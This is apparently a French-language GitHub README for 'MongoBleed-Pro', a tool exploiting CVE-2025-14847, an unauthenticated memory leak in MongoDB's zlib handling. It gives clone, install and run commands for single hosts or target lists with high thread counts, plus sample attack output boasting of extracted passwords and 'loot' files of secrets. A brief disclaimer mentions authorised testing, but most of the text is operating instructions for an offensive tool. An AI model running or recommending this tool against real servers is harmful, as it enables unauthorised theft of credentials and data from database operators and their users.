
une vulnérabilité critique de divulgation de mémoire dans la gestion de la compression zlib de MongoDB. Cet outil permet aux chercheurs en sécurité d'extraire des données sensibles d'instances MongoDB vulnérables.
Outil avancé d'exploitation de fuite de mémoire MongoDB
Continuez à apprendre | Continuez à hacker avec CyberTechAjju
MongoBleed-Pro est un outil d'exploitation avancé pour CVE-2025-14847, une vulnérabilité critique de divulgation de mémoire dans la gestion de la compression zlib de MongoDB. Cet outil permet aux chercheurs en sécurité d'extraire des données sensibles d'instances MongoDB vulnérables.
Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives. L'accès non autorisé à des systèmes informatiques est illégal. Obtenez toujours une autorisation appropriée avant d'effectuer des tests.
# Clone the repository
git clone https://github.com/cybertechajju/CVE-2025-14847_Expolit.git
cd CVE-2025-14847_Expolit
# Install dependencies
pip install -r requirements.txt
python3 mongobleed_pro.py
python3 mongobleed_pro.py --target 192.168.1.100
python3 mongobleed_pro.py --target 192.168.1.100:27018
python3 mongobleed_pro.py --file targets.txt
python3 mongobleed_pro.py --target 192.168.1.100 --threads 100 --min-offset 100 --max-offset 20000
╔══════════════════════════════════════════════════════════════╗
║ 💀 INITIATING MEMORY EXTRACTION SEQUENCE 💀 ║
╚══════════════════════════════════════════════════════════════╝
⚡ Target Acquired: 192.168.1.100:27017
✓ Port OPEN
☠️ VULNERABLE! Initiating attack...
◉ 0x0E31 │ nr_inactive_anon 134420\nnr_active_anon 110832...
☠️ LOOT ACQUIRED: 🔐 Password
→ admin_pass=SuperSecret123
╔══════════════════ EXTRACTION COMPLETE ══════════════════╗
║ 💾 Bytes Extracted: 125,847
║ 📦 Unique Fragments: 342
║ 🔑 Secrets Found: 5
╚══════════════════════════════════════════════════════════╝
| Fichier | Description |
|---|---|
loot_<host>.txt | Secrets extraits dans un format lisible |
dump_<host>.bin | Vidage mémoire brut pour analyse manuelle |
Si vous êtes administrateur MongoDB, mettez à jour vers les versions corrigées :
CyberTechAjju
Ce projet est sous licence MIT - consultez le fichier LICENSE pour plus de détails.
Si vous avez trouvé cet outil utile, merci de lui donner une ⭐ sur GitHub !
「 Continuez à apprendre | Continuez à hacker 」
Fait avec ❤️ par CyberTechAjju
| Propriété | Détails |
|---|
| Identifiant CVE | CVE-2025-14847 |
| Type de vulnérabilité | Divulgation de mémoire |
| Versions affectées | MongoDB < 8.0.10, < 7.3.6, < 7.0.19, < 6.0.23 |
| Cause racine | Lecture hors limites du tampon lors de la décompression zlib |
| Impact | Fuite de mémoire à distance sans authentification |
| Option | Description | Défaut |
|---|
--target | IP/URL cible | Invite interactive |
--file | Fichier contenant la liste des cibles | Aucun |
--threads | Nombre de threads | 50 |
--min-offset | Décalage mémoire minimal | 20 |
--max-offset | Décalage mémoire maximal | 8192 |